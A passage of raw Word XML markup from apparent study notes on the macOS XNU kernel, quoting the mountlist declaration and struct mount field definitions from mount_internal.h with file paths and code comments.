      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_reserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* For future use == 0 */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A36082">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc445313261"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mount list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC"/>
    <w:p w:rsidR="008910BC" w:rsidRPr="00F524D4" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\mount_internal.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TAILQ_HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mntlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mountlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc445313262"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="00F524D4" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\mount_internal.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Structure per mounted file system.  Each mounted file system has an</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * array of operations and an instance record.  The file systems are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * put on a doubly linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TAILQ_HEAD</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vnodelst</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vnode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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mount </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    TAILQ_ENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mou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F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_lis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ount lis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int32_t     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_cou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reference on the mou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lck_mtx_t   mnt_mlock</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utex that protects mount poi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fsops   </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_op</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operations on f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fstable </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_vtabl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configuration info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node    </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_vnodecovered</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vnode we mounted on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nodelst mnt_vnodelis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list of vnodes this mou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nodelst mnt_workerqueu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list of vnodes this mou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nodelst mnt_newvnodes</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list of vnodes this mou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flag</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flag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kern_flag</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kernel only flag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compound_ops</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Available compound operation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lflag</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ount life cycle flag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maxsymlinklen</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size of short symlink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vfsstatfs    mnt_vfssta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cache of filesystem stat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qaddr_t     mnt_data</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private data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Cached values of the IO constraints for the devic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maxreadc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byte count for read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maxwritec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byte count for writ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segreadc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segment count for read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segwritecn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segment count for writ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maxsegreadsiz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segment read siz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maxsegwritesiz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x. segment write siz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alignmentmask</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sk of bits that aren't addressable via DMA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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint32_t    mnt_devblocksiz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the underlying device block siz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ioqueue_depth</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the maxiumum number of commands a device can accep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ioscale</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scale the various throttles/limits imposed on the amount of I/O in fligh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ioflags</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flags for  underlying devic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pending_io_t    mnt_pending_write_size __attribute__</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aligned</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pending_io_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byte count of pending write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pending_io_t    mnt_pending_read_size  __attribute__</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aligned</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pending_io_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byte count of pending read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timeval  mnt_last_write_issued_timestamp</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timeval  mnt_last_write_completed_timestamp</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lck_rw_t    mnt_rwlock</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utex readwrite lock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lck_mtx_t   mnt_renamelock</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utex that serializes renames that change shape of tre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vnode_t     mnt_devvp</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the device mounted on for local file systems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devbsdunit</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the BSD unit number of the devic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64_t    mnt_throttle_mask</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the throttle mask of what devices will be affected by I/O from this m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void</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_throttle_info</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used by the throttle cod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int32_t     mnt_crossref</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refernces to cover lookups  crossing into mp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int32_t     mnt_iterref</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refernces to cover iterations; drained makes it -v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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#if</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_TRIGGERS</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int32_t     mnt_numtriggers</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num of trigger vnodes for this mount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vfs_trigger_callback_t </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_triggercallback</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_triggerdata</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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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XXX 3762912 hack to support HFS filesystem 'owner'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d_t       mnt_fsowner</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gid_t       mnt_fsgroup</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label    </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_mntlabel</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C mount label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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> label    </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mnt_fslabel</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w: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 MAC default fs label */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRPr="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
